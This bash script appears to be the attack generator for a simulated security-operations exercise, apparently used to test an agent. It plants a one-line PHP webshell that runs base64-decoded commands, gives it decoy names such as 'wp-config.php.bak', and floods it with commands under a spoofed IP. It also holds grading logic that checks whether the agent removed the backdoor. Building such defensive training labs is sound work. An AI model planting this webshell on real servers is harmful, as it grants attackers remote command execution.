#!/bin/bash
# Hard Attack Scenario
# Active Webshell C2 Attack - An attacker IP plants a backdoor file in the web root, then continuously sends shell commands
# Hydra style attack though. If the backdoor files isn't removed before killing the process, it re-spawns

if [ -f /tmp/micro_soc_state.env ]; then
    # Load attack properties generated by reset()
    source /tmp/micro_soc_state.env
    BACKDOOR_FILE=$BACKDOOR_FILE_NAME
else
    # Generate random backdoor file name and attacker IP if not env file is missing
    BACKDOOR_NAMES=("backdoor.php" "shell.php" "cmd.php" "wp-config.php.bak" "admin_helper.php")
    BACKDOOR_FILE=${BACKDOOR_NAMES[$((RANDOM % ${#BACKDOOR_NAMES[@]}))]}
    ATTACKER_IP="$((RANDOM % 255 + 1)).$((RANDOM % 255)).$((RANDOM % 255)).$((RANDOM % 255))"
fi

BACKDOOR="/var/www/html/$BACKDOOR_FILE"
FLAG_FILE="/tmp/.hard_attack_active"

# If flag_file exists but backdoor doesn't, that means the backdoor was deleted and then the process was killed
# Based on config in supervisord, hard_attack restarts anyways, but if backdoor is deleted on restart, then agent did its work correctly
# So flag file is deleted and script exits cleanly
if [ -f "$FLAG_FILE" ] && [ ! -f "$BACKDOOR" ]; then
    echo "Backdoor was removed by agent. Attack neutralized."
    rm -f "$FLAG_FILE"
    exit 0
fi

echo "Planting backdoor at $BACKDOOR with attacker IP $ATTACKER_IP"

# Plants the backdoor and creates the flag file
if [ ! -f "$BACKDOOR" ]; then
    cat > "$BACKDOOR" << 'EOF'
<?php if(isset($_GET['cmd'])){ @system(base64_decode($_GET['cmd'])); } ?>
EOF
    touch "$FLAG_FILE"
fi

echo "Starting hard scenario attack..."

# Writes the original PID (first spawn) of the attack script so process killing can be checked cleanly
if [ ! -f /tmp/.hard_attack_pid ]; then
    echo $$ > /tmp/.hard_attack_pid
fi

# Attack commands sent continously 
while true; do
    for i in {1..5}; do
        curl -s -H "X-Forwarded-For: $ATTACKER_IP" \
        -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 [$$]" \
        "http://localhost/$BACKDOOR_FILE?cmd=$(echo -n 'whoami' | base64)" > /dev/null &
    done
    wait
    sleep 0.2
done
